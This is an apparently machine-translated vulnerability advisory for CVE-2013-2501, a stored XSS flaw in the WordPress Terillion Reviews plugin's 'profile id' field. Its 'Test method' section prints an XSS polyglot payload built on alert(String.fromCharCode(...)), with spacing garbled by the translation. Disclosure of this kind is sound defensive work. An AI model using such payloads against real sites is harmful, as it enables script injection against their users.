Release date:
Updated on: 2013-03-25
Affected Systems:
WordPress Terillion Reviews
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58415
CVE (CAN) ID: CVE-2013-2501
WordPress Terillion Reviews allows the Terillion client to display user comments on its website.
Terillion Reviews does not validate the 'profile id' field, allowing attackers to execute sustained XSS attacks through specially crafted requests.
<* Source: Aditya Balapure
Link: http://osvdb.org/91123
Http://seclists.org/bugtraq/2013/Mar/54
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
'; Alert (String. fromCharCode (88,83, 83) //'; alert (String. fromCharCode (88,83, 83 ))//";
Alert (String. fromCharCode (88,83, 83) // "; alert (String. fromCharCode (88,83, 83 ))//--
> </SCRIPT> "> '> <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://wordpress.org/extend/plugins/terillion-reviews/changelog/